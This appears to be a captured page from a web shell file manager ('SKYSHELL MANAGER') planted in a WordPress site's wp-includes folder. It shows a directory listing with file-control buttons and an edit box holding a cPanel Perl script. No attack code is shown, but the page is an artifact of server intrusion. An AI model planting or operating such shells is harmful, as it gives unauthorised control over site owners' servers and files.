📁
SKYSHELL MANAGER
PHP v8.2.31
Create
Create
Path:
root
/
home
/
thevaxnx
/
nativize.com
/
staging
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
wp-links-opml.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: leechprotectinstall
#!/usr/local/cpanel/3rdparty/bin/perl # cpanel - bin/leechprotectinstall Copyright 2022 cPanel, L.L.C. # All rights reserved. # copyright@cpanel.net http://cpanel.net # This code is subject to the cPanel license. Unauthorized copying is prohibited package bin::leechprotectinstall; use strict; use warnings; use Cpanel::LeechProtect::DB (); my $force = @ARGV && grep( /^--force$/, @ARGV ) ? 1 : 0; __PACKAGE__->script($force) unless caller(); sub script { my ($force) = @_; eval { Cpanel::LeechProtect::DB->new->initialize_db($force); }; # leechprotect is built into ea4 so no need to modify httpd.conf return; } 1;
Save